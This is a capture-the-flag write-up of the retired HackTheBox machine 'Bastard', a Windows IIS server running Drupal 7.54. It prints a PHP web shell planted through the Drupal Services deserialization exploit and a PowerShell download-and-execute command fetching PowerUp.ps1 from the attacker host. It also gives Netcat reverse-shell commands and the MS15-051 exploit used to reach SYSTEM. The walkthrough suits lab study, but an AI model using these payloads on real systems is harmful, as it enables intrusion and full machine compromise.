Skip to content

Latest commit

 

History

History
130 lines (102 loc) · 4.33 KB

write-up-bastard.md

File metadata and controls

130 lines (102 loc) · 4.33 KB

Bastard

This is the write-up for the box Bastard that got retired at the 16th September 2017. My IP address was 10.10.14.23 while I did this.

Let's put this in our hosts file:

10.10.10.9    bastard.htb

Enumeration

Starting with a Nmap scan:

nmap -sC -sV -o nmap/bastard.nmap 10.10.10.9
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Checking HTTP (Port 80)

As the web server is IIS version 7.5 the OS of the box is most likely Windows Sever 2008 R2 server.

On the web page there is a Drupal installation. One of the default files of Drupal is the /CHANGELOG.txt where we can find out which version this is. The version is 7.54 which was released on February 1st 2017.

Looking for exploits for this:

searchsploit drupal 7

The exploit to use is called "Drupal 7.x Module Services - Remote Code Execution" which is a PHP serialization vulnerability. We will change some lines in the code to get command execution and file upload and set the variables correctly:

# (...)
$url = 'http://10.10.10.9/';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$phpCode = <<<'EOD'
<?php
if (isset($_REQUEST['upload'])) {
        file_put_contents($_REQUEST['upload'], file_get_contents("http://10.10.14.23:8000/" . $_REQUEST['upload']));
};
if (isset($_REQUEST['exec'])) {
        echo "<pre>" . shell_exec($_REQUEST['exec']) . "</pre>";
};
?>
EOD;

$file = [
    'filename' => 'exploit.php',
    'data' => $phpCode
];
# (...)

Run the exploit:

php5 drupal_exploit.php
# Output
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9//exploit.php

Now when browsing to this page we can test if we have command execution:

http://10.10.10.9/exploit.php?exec=whoami

It outputs that we are NT Authority\iusr.

Now we either have command execution with this method or use the token in the file session.json and replace the cookies with these values and get logged in as Admin:

Admin page

Command Execution on HTTP

We should run any enumeration script on this box to get an attack surface. I will run PowerUP.ps1 from the Powersploit Framework first.

Download the file from my local machine and run it:

.../exploit.php?exec=echo IEX(New-Object Net.WebClient).downloadString('http://10.10.14.23:8000/PowerUp.ps1') | powershell -noprofile -

Unfortunately there is no interesting information in this output so lets run another enumeration script. I will run Sherlock now to get some suggestions for vulnerabilities to exploit.

We want to upload Netcat for Windows on this box and execute it to get a reverse shell:

/exploit.php?upload=nc64.exe&exec=nc64.exe -e cmd 10.10.14.23 9001

After running this our listener on port 9001 starts a reverse shell.

Privilege Escalation

The enumeration script suggested some exploits to use and I will use MS15-051 - Win32k LPE vulnerability also known as CVE-2015-1701. To use this exploit we copy the Proof-of-Concept script from GitHub to our local machine and upload and execute it on the box.

/exploit.php?upload=ms15-051x64.exe&exec=ms15-051x64.exe whoami

This outputs that we are NT Authority\SYSTEM and thus the exploit works and it is possible to start a shell with this.

/exploit.php?upload=ms15-051x64.exe&exec=ms15-051x64.exe "nc64.exe -e cmd 10.10.14.23 9002"

After running this our listener on port 9002 starts a reverse shell with the user NT Authority\SYSTEM and the box is done!